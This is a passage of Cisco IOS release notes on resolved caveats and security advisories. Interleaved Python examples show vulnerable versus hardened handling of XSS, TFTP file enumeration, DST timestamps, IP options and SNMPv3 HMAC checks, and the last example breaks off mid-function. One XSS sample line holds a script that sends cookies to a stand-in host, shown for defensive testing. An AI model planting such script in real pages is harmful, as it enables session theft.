Conditions: This symptom has been observed on a DLSw/SNASw concentration router which is providing connectivity for 300 to 400 physical units through DLSw.

Workaround: There is no workaround.

CSCsc25745

Symptoms: In rare circumstances, an SNA Switch (SNASw) may get a "half session" towards the backup DLUS: the output of the show snasw session local command shows a CONWINNER session but no CONLOSER session. On the mainframe side, the link appears to hang.

This creates no problem in operation, except when issuing a GiveBack command or a Takeover command, in which case, the link towards the backup DLUS does not work.

Conditions: This symptom has been observed on a Cisco 7200 router with an SNASw.

Workaround: The situation can be cleared with a snasw stop session pcid using the PCID shown with the show snasw session local command.

Wide-Area Networking

CSCsc08345

Symptoms: A Cisco router may crash unexpectedly due to a bus error when it dereferences a pointer to freed memory in one of the error paths in TCP-to-PAD translation.

Conditions: This symptom is observed on a Cisco 7500 series router.

Workaround: There is no workaround.

Resolved Caveats—Cisco IOS Release 12.2(31)

This section describes possibly unexpected behavior by Cisco IOS Release 12.2(31). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(31). This section describes severity 1 and 2 caveats and select severity 3 caveats.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

IBM Connectivity

CSCeh18295

Symptoms: DLSw circuits do not connect.

Conditions: This symptom is observed when DLSw Ethernet redundancy is configured via the dlsw transparent switch-support command.

Workaround: Recycle DLSw on the master router.

Further Problem Description: The output of the show dlsw transparent cache command shows the NEGATIVE state for the circuits on the master router although no actual circuits exist on either the master router or the slave router.

CSCeh90809

Symptoms: Removing BSTUN peer attribute causes a Cisco router to crash.

Conditions: This symptom occurs when you change the bstun protocol-group protocol name global configuration command and subsequently change the bsc char-set value (from ascii to ebcdic or vice versa) on the BSTUN encapsulated interface. The router then crashes.

Workaround: There is no workaround.

Miscellaneous

CSCea84387

Symptoms: A user session may pause indefinitely, causing a Cisco router to become unresponsive.

Conditions: This symptom is observed when multiple simultaneous users enter modular QoS CLI (MQC) commands on the same router via separate vty sessions.

Workaround: Allow only one user at a time to enter MQC commands.

CSCeb47225

Symptoms: If a key is configured on a tunnel interface, the inbound access-list on that interface is ignored.

Conditions: This problem is seen with a configuration that is similar to the following:

interface Tunnel0
 ip address 192.168.1.1 255.255.255.0
 ip access-group 100 in
 tunnel source FastEthernet0/0
 tunnel destination 172.16.1.1
 tunnel key 1
end

This problem does not occur if "tunnel key" is not configured.

Workaround: Remove the "tunnel key."

CSCed83616

Symptoms: A Cisco router may reload when you enter the show standby or show standby brief command.

Conditions: This symptom is observed on a Cisco Multiprocessor WAN Application Module (MWAM) when multiple HSRP groups are configured and unconfigured in a loop while traffic for the HSRP groups is being processed. The symptom may be platform-independent.

However, a stress scenario in which many HSRP groups are configured and unconfigured while the show standby or show standby brief command is executed may be a rather uncommon scenario.

Workaround: Do not enter the show standby or show standby brief command while configuration changes are being made.

CSCed90476

Symptoms: Unable to configure framing CRC4 (Australian) on a Channelized E1.

Conditions: This symptom is observed on a Cisco 10000 series router but is not platform dependent.

Workaround: There is no workaround.

CSCee41831

Symptoms: A SegV exception may occur on a router when you enter the write memory or copy running-config startup-config command.

Conditions: This symptom is observed on a Cisco 1700 series and Cisco 2600 series when you enter the write memory or copy running-config startup-config command and when the NVRAM is corrupted.

Workaround: Erase the NVRAM and then enter the write memory or copy running-config startup-config command.

CSCef08173

Symptoms: VIP with PA-2FE may reload due to memory corruption caused by PA-2FE hardware.

Conditions: This problem is triggered when VIP/PA is stressed, VIP is not able to serve memory read/write request from PA hardware, and there are PCI retry timeouts.

Workaround: There is no workaround.

CSCeg36362

Symptoms: A Cisco 7200 series that is configured with an NPE-G1 may reload unexpectedly because of a bus error.

Conditions: This symptom is observed when the Cisco 7200 series is configured for Fast Switching.

Workaround: There is no workaround.

CSCeg86187

Symptoms: The ip mroute-cache distributed interface configuration command is not retained after you reload a router.

Conditions: This symptom is observed on a Cisco 7500 series.

Workaround: After the router has reloaded, reconfigure the ip mroute-cache distributed interface configuration command on each affected interface.

CSCeh17756

Symptoms: The PIM assert mechanism may not function properly, causing PE routers to remove VRF subinterfaces from output interface lists, and, in turn, causing multicast traffic to be dropped.

Conditions: This symptom is observed when redundant PE routers and CE routers are located on one LAN segment and when the CE routers select different PE routers as their next hop.

Workaround: Change the configuration in such a way that all CE routers on one LAN segment select the same PE router as their next hop.

CSCei61732

Cisco IOS may permit arbitrary code execution after exploitation of a heap-based buffer overflow vulnerability. Cisco has included additional integrity checks in its software, as further described below, that are intended to reduce the likelihood of arbitrary code execution.

Cisco has made free software available that includes the additional integrity checks for affected customers.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051102-timers.shtml.

CSCin55942

Symptoms: When you enter the channel-group command, a router may crash.

Conditions: This symptom is observed when you enter the channel-group command on native FE interfaces on a Cisco 3660 router or on NM-xFE interfaces on a Cisco 3600 series or Cisco 3700 series.

The channel-group command should not be used on native FE ports or on NM-FE ports because it is not supported on these ports. The channel-group command is meant only for NM-1GE GE ports and switching FE ports.

Workaround: There is no workaround. The fix for this DDTS ensures that the router does not crash. However, EtherChannel is not supported on native FE ports and NM-xFE ports on a Cisco 3600 series and Cisco 3700 series.

CSCin81933

Symptoms: At a cold temperature, a Cisco 7200 series does not boot with a PA-A3-8T1IMA or PA-A3-8E1IMA port adapter and generates a watchdog timeout error.

Conditions: This symptom is observed on a Cisco 7200 series that is configured with an NPE-300 or NPE-400 and an IMA port adapter.

Workaround: There is no workaround.

CSCin93609

Symptoms: A Cisco 7200 series or Cisco 7500 series may crash when bridged PVCs are deleted and added to an IMA interface of a PA-A3-8T1IMA or PA-A3-8E1IMA port adapter.

Conditions: This symptom is observed when the router is configured for bridging across ATM IMA PVCs, when the PVCs carry traffic, and when a script runs that deletes and adds PVCs across the IMA links. These PVCs are not among the bridged PVCs that carry traffic. The router crashes in about one to two hours.

Workaround: There is no workaround.

CSCsb09190

Symptoms: A router misses an entry in its label forwarding table, which is shown in the output of the show tag-switching forwarding-table EXEC command for the missing entry and in the output of the show ip cef detail EXEC command for the prefix.

Conditions: This symptom is observed on a Cisco router that is configured for Multiprotocol Label Switching (MPLS) and that learns its routes through iBGP from redundant route reflectors (RRs) when BGP labeling is not enabled.

Workaround: There is no workaround. However, when you enter the clear ip route EXEC command for the affected prefix, the prefix is reinstalled in the label forwarding table.

CSCuk49421

Symptoms: A Cisco router that is running Cisco IOS Release 12.2, 12.2S, 12.2T, 12.3, or 12.3T may fail to fast switch IP packets correctly when NAT has been configured.

Conditions: This problem can only occur when NAT has been configured on the router.

Workaround: Disable fast switching of IP packets so that they are correctly process switched.

Wide-Area Networking

CSCsa87205

Symptoms: A router that is configured for PPP Multilink reloads because of a bus error.

Conditions: This symptom is observed after a Telnet or SSH session is established when you enter the who command.

Workaround: There is no workaround.

Resolved Caveats—Cisco IOS Release 12.2(29b)

Cisco IOS Release 12.2(29b) is a rebuild release for Cisco IOS Release 12.2(29). The caveats in this section are resolved in Cisco IOS Release 12.2(29b) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCeg62070

Symptoms: Tracebacks or crash are seen during HTTP transactions with long URLs.

Conditions: The crash is seen when the length of any token in the URL of the request is excessively long.

Workaround: Disable HTTP server using the no ip http server command.

CSCsc64976

A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output from a show buffers command, will be passed to the browser requesting the page. This HTML code could be interpreted by the client browser and potentially execute malicious commands against the device or other possible cross-site scripting attacks. Successful exploitation of this vulnerability requires that a user browse a page containing dynamic content in which HTML commands have been injected.

Cisco will be making free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml
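The two CSCsc64976 entries above describe the same flaw: dynamic "show" output is copied into an HTML page without encoding. The following is an added example, not Cisco IOS code; it models the vulnerable and the hardened rendering side by side and includes the reflection probe a tester would use to tell them apart. The sample command output and the planted markup are constructed, and the exact injection point on a real device is not stated by the caveat.

```python
import html
from typing import Callable, List

# Constructed stand-in for the dynamic text a "show buffers" page would echo.
# The last line carries markup that an attacker managed to plant in a string
# the command later prints; where that string lives on a real device is an
# assumption, the caveat only describes the class of bug.
SAMPLE_OUTPUT: List[str] = [
    "Buffer elements:",
    "     499 in free list (500 max allowed)",
    'Interface buffer pool <script>new Image().src="http://198.51.100.7/?c="+document.cookie</script>:',
]


def render_unescaped(lines: List[str]) -> str:
    """Vulnerable pattern: CLI output is concatenated straight into the HTML body."""
    return "<html><body><pre>" + "\n".join(lines) + "</pre></body></html>"


def render_escaped(lines: List[str]) -> str:
    """Hardened pattern: every dynamic line is entity-encoded before it is emitted,
    so '<', '>', '&' and quotes reach the browser as text, not as markup."""
    body = "\n".join(html.escape(line, quote=True) for line in lines)
    return "<html><body><pre>" + body + "</pre></body></html>"


# Marker used by the check below; it is harmless text until a browser parses it as a tag.
PROBE = '<img src=x onerror="alert(1)">'


def reflects_unescaped(render: Callable[[List[str]], str], probe: str = PROBE) -> bool:
    """Tester's check: push a marker through the dynamic path and report whether it
    comes back byte-for-byte, which is exactly when the browser would execute it."""
    page = render(["static line", probe])
    return probe in page


if __name__ == "__main__":
    print("unescaped renderer reflects markup:", reflects_unescaped(render_unescaped))
    print("escaped renderer reflects markup:  ", reflects_unescaped(render_escaped))
    print(render_escaped(SAMPLE_OUTPUT))
```

The check is deliberately the simplest possible one: if the literal probe survives, the encoding step is missing somewhere on that path, whatever the surrounding template looks like.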

CSCse04560

Symptoms: A TFTP client that tries to transfer a file from a Cisco IOS device configured as a TFTP server, and that is denied by an ACL, receives a different result depending on whether the file is being offered for download or not. This may allow a third party to enumerate which files are available for download.

Conditions: The tftp-server command is configured on the device and an ACL restricting access to the file in question has been applied, as in this example:

tftp-server flash:filename1 access-list-number
access-list access-list-number permit 192.168.1.0 0.0.0.255
access-list access-list-number deny any

Workaround: The following workarounds can be applied:

1. Interface ACL: Configure and attach an access list to every router interface that is active and configured for IP packet processing. Example:

access-list access-list-number remark --- the following hosts and networks are ALLOWED for TFTP access
access-list access-list-number permit udp host source_1 host interface_address_1 eq 69
access-list access-list-number permit udp host source_2 host interface_address_2 eq 69
access-list access-list-number permit udp source source-wildcard host interface_address_1 eq 69
access-list access-list-number permit udp source source-wildcard host interface_address_2 eq 69
access-list access-list-number remark --- everyone else is DENIED for TFTP access
access-list access-list-number deny udp any host interface_address_1 eq 69
access-list access-list-number deny udp any host interface_address_2 eq 69
access-list access-list-number remark --- any other traffic to/through the router is allowed
access-list access-list-number permit ip any any
!
interface Ethernet0/0
 ip access-group access-list-number in

Because the TFTP server in Cisco IOS, once enabled, listens by default on all interfaces enabled for IP processing, the access list needs to deny traffic to each and every IP address assigned to any active router interface.

2. Control Plane Policing: Configure and apply a CoPP policy. For example:

access-list access-list-number remark --- Do not police TFTP traffic from trusted hosts and networks
access-list access-list-number deny udp host source_1 any eq 69
access-list access-list-number deny udp source source-wildcard any eq 69
access-list access-list-number remark --- Police TFTP traffic from untrusted hosts and networks
access-list access-list-number permit udp any any eq 69
access-list access-list-number remark --- Do not police any other traffic going to the router
access-list access-list-number deny ip any any
!
class-map match-all tftp-class
 match access-group access-list-number
!
policy-map control-plane-policy
 ! Drop all traffic that matches the class tftp-class
 class tftp-class
  drop
!
control-plane
 service-policy input control-plane-policy

Note: CoPP is only available on certain platforms and Cisco IOS releases. Additional information on the configuration and use of the CoPP feature can be found at the following URL: http://www.cisco.com/en/US/products/sw/iosswrel/ps1838/products_white_paper09186a0080211f39.shtml

3. Infrastructure ACLs (iACL): Although it is often difficult to block traffic transiting your network, it is possible to identify traffic that should never be allowed to target your infrastructure devices and to block that traffic at the border of your network. Infrastructure ACLs are considered a network security best practice and should be considered as a long-term addition to good network security as well as a workaround for this specific vulnerability. The white paper entitled "Protecting Your Core: Infrastructure Protection Access Control Lists" presents guidelines and recommended deployment techniques for iACLs: http://www.cisco.com/warp/public/707/iacl.html

4. Configuring Receive Access Lists (rACLs): For distributed platforms, rACLs may be an option starting in Cisco IOS Release 12.0(21)S2 for the Cisco 12000 series GSR and Cisco IOS Release 12.0(24)S for the Cisco 7500 series. Receive access lists protect the device from harmful traffic before the traffic can impact the route processor. Receive path ACLs are considered a network security best practice, and should be considered as a long-term addition to good network security, as well as a workaround for this specific vulnerability. The CPU load is distributed to the line card processors and helps mitigate load on the main route processor. The white paper entitled "GSR: Receive Access Control Lists" will help identify and allow legitimate traffic to your device and deny all unwanted packets: http://www.cisco.com/warp/public/707/racl.html

NOTE: The suggested workarounds are an "all or nothing" solution. While the tftp-server feature in Cisco IOS allows per-file ACLs to be attached to every file being offered for download, the suggested workarounds are global and will either prevent or allow access to all files being shared. It is recommended to apply the suggested workarounds in addition to the existing per-file ACLs, instead of replacing them.
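The enumeration oracle in CSCse04560 is a behavioural difference, so it is easiest to see in code. The following is an added example, not Cisco IOS code: a minimal TFTP read-request handler in the leaky form the caveat describes (one error for "not offered", a different one for "denied by ACL") beside a variant that answers an unauthorised client identically either way, plus the client-side check that tells the two apart. The offered file, the ACL network and the client addresses are constructed; answering "File not found" in both cases is one way to close the oracle and is this example's choice, not a statement of how the fixed IOS release behaves.

```python
import ipaddress
import struct
from typing import Callable, Dict, List, Tuple

# TFTP opcodes and error codes from RFC 1350.
OP_RRQ, OP_ERROR = 1, 5
ERR_NOT_FOUND, ERR_ACCESS = 1, 2

# Constructed server state, standing in for a configuration such as
#   tftp-server flash:c7200-image.bin 10
#   access-list 10 permit 192.168.1.0 0.0.0.255
OFFERED: Dict[str, List[ipaddress.IPv4Network]] = {
    "c7200-image.bin": [ipaddress.ip_network("192.168.1.0/24")],
}


def rrq(name: str, mode: str = "octet") -> bytes:
    """Build a read request: opcode(2) | filename | 0 | mode | 0."""
    return struct.pack("!H", OP_RRQ) + name.encode("ascii") + b"\x00" + mode.encode("ascii") + b"\x00"


def parse_rrq(pkt: bytes) -> Tuple[str, str]:
    """Parse a read request, refusing anything that is not a complete RRQ."""
    if len(pkt) < 4 or struct.unpack("!H", pkt[:2])[0] != OP_RRQ:
        raise ValueError("not an RRQ")
    fields = pkt[2:].split(b"\x00")
    if len(fields) < 3 or not fields[0] or not fields[1]:
        raise ValueError("truncated RRQ")
    return fields[0].decode("ascii"), fields[1].decode("ascii").lower()


def error_packet(code: int, msg: str) -> bytes:
    return struct.pack("!HH", OP_ERROR, code) + msg.encode("ascii") + b"\x00"


def _acl_permits(name: str, src: str) -> bool:
    return any(ipaddress.ip_address(src) in net for net in OFFERED.get(name, []))


def handle_rrq_leaky(pkt: bytes, src: str) -> bytes:
    """Behaviour the caveat describes: the reply reveals whether the name is offered."""
    name, _ = parse_rrq(pkt)
    if name not in OFFERED:
        return error_packet(ERR_NOT_FOUND, "File not found")
    if not _acl_permits(name, src):
        return error_packet(ERR_ACCESS, "Access violation")
    return b"DATA"  # stand-in for the first DATA block of a real transfer


def handle_rrq_uniform(pkt: bytes, src: str) -> bytes:
    """One way to close the oracle (example choice): a client the ACL does not permit
    gets the same reply whether or not the file exists."""
    name, _ = parse_rrq(pkt)
    if not _acl_permits(name, src):
        return error_packet(ERR_NOT_FOUND, "File not found")
    return b"DATA"


def is_enumeration_oracle(handler: Callable[[bytes, str], bytes], src: str) -> bool:
    """Check from an unauthorised client: does an offered name draw a different
    reply than a name that is not offered at all?"""
    offered_reply = handler(rrq("c7200-image.bin"), src)
    bogus_reply = handler(rrq("does-not-exist.bin"), src)
    return offered_reply != bogus_reply


if __name__ == "__main__":
    outsider = "203.0.113.9"  # constructed address outside the permitted network
    print("leaky handler is an oracle:  ", is_enumeration_oracle(handle_rrq_leaky, outsider))
    print("uniform handler is an oracle:", is_enumeration_oracle(handle_rrq_uniform, outsider))
```

The per-file ACL still does its job in both handlers; only the error path differs, which is why the caveat text stresses that the global workarounds should be layered on top of the per-file ACLs rather than replace them.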

CSCsg70355

Symptoms: Starting in calendar year 2007, daylight savings summer-time rules may cause Cisco IOS to generate timestamps (such as in syslog messages) that are off by one hour.

Conditions: The Cisco IOS configuration command:

clock summer-time zone recurring

uses United States standards for daylight savings time rules by default. The Energy Policy Act of 2005 (H.R.6.ENR), Section 110 changes the start date from the first Sunday of April to the second Sunday of March. It changes the end date from the last Sunday of October to the first Sunday of November.

Workaround: A workaround is possible by using the clock summer-time configuration command to manually configure the proper start date and end date for daylight savings time. After the summer-time period for calendar year 2006 is over, one can for example configure:

clock summer-time PDT recurring 2 Sun Mar 2:00 1 Sun Nov 2:00

(This example is for the US/Pacific time zone.)

Not A Workaround: Using NTP is not a workaround to this problem. NTP does not carry any information about timezones or summertime.
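To see exactly which timestamps CSCsg70355 affects, the two rule sets can be evaluated side by side. The following is an added example, not Cisco code: it computes the old and the 2007 US transition dates for a year and reports the windows in which a device still on the old rule stamps logs one hour early. Transitions are treated at date granularity (the 2:00 local changeover within the transition day is ignored), which is an assumption of the example.

```python
from datetime import date, timedelta

SUNDAY = 6  # date.weekday() numbering: Monday == 0


def nth_weekday(year: int, month: int, weekday: int, n: int) -> date:
    """The n-th (1-based) occurrence of `weekday` in the given month."""
    first = date(year, month, 1)
    offset = (weekday - first.weekday()) % 7
    return first + timedelta(days=offset + 7 * (n - 1))


def last_weekday(year: int, month: int, weekday: int) -> date:
    """The last occurrence of `weekday` in the given month."""
    next_month = date(year + (month == 12), month % 12 + 1, 1)
    last_day = next_month - timedelta(days=1)
    return last_day - timedelta(days=(last_day.weekday() - weekday) % 7)


def us_dst_old(year: int):
    """Pre-2007 rule built into the default: first Sunday of April to last Sunday of October."""
    return nth_weekday(year, 4, SUNDAY, 1), last_weekday(year, 10, SUNDAY)


def us_dst_2007(year: int):
    """Energy Policy Act of 2005 rule: second Sunday of March to first Sunday of November."""
    return nth_weekday(year, 3, SUNDAY, 2), nth_weekday(year, 11, SUNDAY, 1)


def timestamp_skew_hours(when: date) -> int:
    """Hours a device still on the old rule is off on local date `when`.
    -1 means its timestamps read one hour earlier than the correct local time; 0 means they agree."""
    old_start, old_end = us_dst_old(when.year)
    new_start, new_end = us_dst_2007(when.year)
    in_old = old_start <= when < old_end
    in_new = new_start <= when < new_end
    return int(in_old) - int(in_new)


def affected_windows(year: int):
    """The two [start, end) date ranges in `year` during which unpatched timestamps are off by an hour."""
    old_start, old_end = us_dst_old(year)
    new_start, new_end = us_dst_2007(year)
    return (new_start, old_start), (old_end, new_end)


if __name__ == "__main__":
    for year in (2007, 2008):
        spring, autumn = affected_windows(year)
        print(year, "spring gap:", spring, "autumn gap:", autumn)
    print("skew on 2007-03-20:", timestamp_skew_hours(date(2007, 3, 20)))
```

Both gaps fall on the side where the device is behind real local time, which matters when correlating syslog from a mixed fleet: events on an unpatched router in those windows appear to have happened an hour before the same events logged elsewhere.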

CSCsj44081

Cisco IOS Software has been enhanced with the introduction of additional software checks to signal improper use of internal data structures. This enhancement was introduced in select Cisco IOS software releases published after April 5, 2007.

Details: With the new enhancement in place, Cisco IOS software will emit a "%DATACORRUPTION-1-DATAINCONSISTENCY" error message when it detects an inconsistency in its internal data structures. This is a new error message. The following is an example.

The %DATACORRUPTION-1-DATAINCONSISTENCY error message is preceded by a timestamp
May 17 10:01:27.815 UTC: %DATACORRUPTION-1-DATAINCONSISTENCY: copy error

The error message is then followed by a traceback.

It is important to note that this error message does not imply that packet data is being corrupted. It does, however, provide an early indicator of other conditions that can eventually lead to poor system performance or an IOS restart.

Recommended Action: Collect show tech-support command output and open a service request with the Technical Assistance Center (TAC) or designated support organization. Pay particular attention to any other error messages or error symptoms that accompany the "%DATACORRUPTION-1-DATAINCONSISTENCY" message and note those to your support contact.

IBM Connectivity

CSCsf28840

A vulnerability exists in the Data-link Switching (DLSw) feature in Cisco IOS where an invalid value in a DLSw message could result in a reload of the DLSw device. Successful exploitation of this vulnerability requires that an attacker be able to establish a DLSw connection to the device.

There are workarounds available for this vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070110-dlsw.shtml

IP Routing Protocols

CSCec71950

Cisco routers and switches running Cisco IOS or Cisco IOS XR software may be vulnerable to a remotely exploitable crafted IP option Denial of Service (DoS) attack. Exploitation of the vulnerability may potentially allow for arbitrary code execution. The vulnerability may be exploited after processing an Internet Control Message Protocol (ICMP) packet, Protocol Independent Multicast version 2 (PIMv2) packet, Pragmatic General Multicast (PGM) packet, or URL Rendezvous Directory (URD) packet containing a specific crafted IP option in the packet's IP header. No other IP protocols are affected by this issue.

Cisco has made free software available to address this vulnerability for affected customers.

There are workarounds available to mitigate the effects of the vulnerability.

This vulnerability was discovered during internal testing.

This advisory is available at:

http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml
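CSCec71950 and its companion CSCek26492, listed above and in the 12.2(34a) section, both turn on how a router walks the variable-length options area of an IPv4 header. The advisory does not disclose which option or which malformation triggers the fault, so the following added example (not Cisco code) shows only the generic part: an options walker that enforces every length rule a forwarding path must check before trusting an option's own length byte, together with a small header builder used to construct well-formed and malformed inputs. The option kinds and addresses in the sample inputs are constructed.

```python
import struct
from dataclasses import dataclass
from typing import List

# Single-byte option kinds from RFC 791; every other kind carries a length byte.
IPOPT_EOL = 0
IPOPT_NOP = 1


@dataclass
class IpOption:
    kind: int
    data: bytes


class MalformedOptions(ValueError):
    """Raised for any options area a receiver must refuse to walk."""


def parse_ipv4_options(header: bytes) -> List[IpOption]:
    """Return the options carried in an IPv4 header, or raise MalformedOptions.

    Checks, in order: the header is at least 20 bytes; IHL is sane and covered
    by the bytes we hold; each multi-byte option has a length byte; that length
    is at least 2 (kind + length); and it does not run past the end of the header.
    """
    if len(header) < 20:
        raise MalformedOptions("header shorter than 20 bytes")
    ihl = (header[0] & 0x0F) * 4
    if ihl < 20 or ihl > len(header):
        raise MalformedOptions(f"IHL {ihl} does not fit the {len(header)}-byte header")
    opts = header[20:ihl]
    out: List[IpOption] = []
    i = 0
    while i < len(opts):
        kind = opts[i]
        if kind == IPOPT_EOL:
            break
        if kind == IPOPT_NOP:
            i += 1
            continue
        if i + 1 >= len(opts):
            raise MalformedOptions(f"option {kind} has no length byte")
        length = opts[i + 1]
        if length < 2:
            raise MalformedOptions(f"option {kind} length {length} is below the 2-byte minimum")
        if i + length > len(opts):
            raise MalformedOptions(f"option {kind} length {length} overruns the header")
        out.append(IpOption(kind, bytes(opts[i + 2:i + length])))
        i += length
    return out


def build_ipv4_header(options: bytes, proto: int = 1) -> bytes:
    """Constructed test header: 20 fixed bytes plus `options` padded to a 4-byte
    multiple, IHL set accordingly, checksum left at zero (not needed for parsing)."""
    options = options + b"\x00" * ((-len(options)) % 4)
    ihl = 5 + len(options) // 4
    fixed = struct.pack(
        "!BBHHHBBH4s4s",
        0x40 | ihl, 0, 20 + len(options), 0, 0, 64, proto, 0,
        bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2]),
    )
    return fixed + options


if __name__ == "__main__":
    # Constructed inputs: a well-formed Router Alert option (kind 148, length 4)
    # and one whose length byte claims far more bytes than the header carries.
    print(parse_ipv4_options(build_ipv4_header(bytes([148, 4, 0, 0]))))
    try:
        parse_ipv4_options(build_ipv4_header(bytes([148, 40, 0, 0])))
    except MalformedOptions as exc:
        print("rejected:", exc)
```

The same walker applies whether the datagram carries ICMP, PIMv2, PGM or URD; what differs in the advisory is only which of those input paths reached the options code, which is why the fix and the workarounds are described per protocol.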

CSCsi23231

The Cisco Next Hop Resolution Protocol (NHRP) feature in Cisco IOS contains a vulnerability that can result in a restart of the device or possible remote code execution.

NHRP is a primary component of the Dynamic Multipoint Virtual Private Network (DMVPN) feature.

NHRP can operate in three ways: at the link layer (Layer 2), over Generic Routing Encapsulation (GRE) and multipoint GRE (mGRE) tunnels and directly on IP (IP protocol number 54). This vulnerability affects all three methods of operation.

NHRP is not enabled by default for Cisco IOS.

This vulnerability is addressed by Cisco bug IDs CSCin95836 (registered customers only) for non-12.2 mainline releases and CSCsi23231 (registered customers only) for 12.2 mainline releases.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-nhrp.shtml.

Miscellaneous

CSCsb11124

The Cisco IOS Stack Group Bidding Protocol (SGBP) feature in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable denial of service condition. Devices that do not support or have not enabled the SGBP protocol are not affected by this vulnerability.

Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.

Cisco has published a Security Advisory on this issue; it is available at http://www.cisco.com/warp/public/707/cisco-sa-20060118-sgbp.shtml

CSCsb12598

A Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. To trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial of Service (DoS); however, the vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml

Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml

A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCsb26972

Symptoms: A Cisco router may experience a bus error crash.

Conditions: This symptom may be triggered by an event such as an ISDN connection.

Workaround: There is no workaround.

CSCsc72722

Symptoms: TCP connections that are opened through a Cisco IOS Firewall (CBAC) may not timeout.

Conditions: With Cisco IOS Firewall (CBAC) enabled, the TCP idle timer for a session may be reset even by TCP packets that fail TCP inspection and are subsequently dropped. This could lead to the TCP session not timing out.

Workaround: There is no workaround.

CSCsd92405

Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, these vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device, and they are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.

Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml

A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCsd95616

Two crafted Protocol Independent Multicast (PIM) packet vulnerabilities exist in Cisco IOS software that may lead to a denial of service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml.

CSCsf04754

Multiple Cisco products contain either of two authentication vulnerabilities in the Simple Network Management Protocol version 3 (SNMPv3) feature. These vulnerabilities can be exploited when processing a malformed SNMPv3 message. These vulnerabilities could allow the disclosure of network information or may enable an attacker to perform configuration changes to vulnerable devices. The SNMP server is an optional service that is disabled by default. Only SNMPv3 is impacted by these vulnerabilities. Workarounds are available for mitigating the impact of the vulnerabilities described in this document.

The United States Computer Emergency Response Team (US-CERT) has assigned Vulnerability Note VU#878044 to these vulnerabilities.

Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0960 has been assigned to these vulnerabilities.

This advisory will be posted at http://www.cisco.com/warp/public/707/cisco-sa-20080610-snmpv3.shtml
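The authentication flaw tracked as CVE-2008-0960 is publicly documented as a truncated-HMAC check: the receiver compared only as many bytes of the HMAC-96 tag as the sender placed in msgAuthenticationParameters, so a one-byte tag could be guessed in at most 256 tries and an empty one passed outright. The Python below is an added illustration of that bug pattern next to the correct check; it is not Cisco code and not a real SNMPv3 encoder. The key, the message bytes and the omission of the zeroed-field step are constructed for the example.

```python
"""Added example: a truncated-HMAC authentication check (the CVE-2008-0960
pattern), in vulnerable and fixed form.  Not Cisco code; the key and message
bytes below are constructed for the example."""
import hashlib
import hmac

# SNMPv3 USM (RFC 3414) carries the first 12 bytes of an HMAC-MD5 or
# HMAC-SHA-1 over the message in msgAuthenticationParameters.
AUTH_TAG_LEN = 12

# Constructed sample inputs.  A real implementation derives the localized
# key from the user's password and the engine ID, and computes the HMAC with
# the auth-parameters field zeroed; both steps are omitted here.
SAMPLE_KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0deadbeef")
SAMPLE_MSG = b"\x30\x2a\x02\x01\x03" + b"constructed-snmpv3-msg-body"


def compute_tag(auth_key: bytes, wire_msg: bytes) -> bytes:
    """HMAC-SHA-1-96: the first 12 bytes of HMAC-SHA-1(key, message)."""
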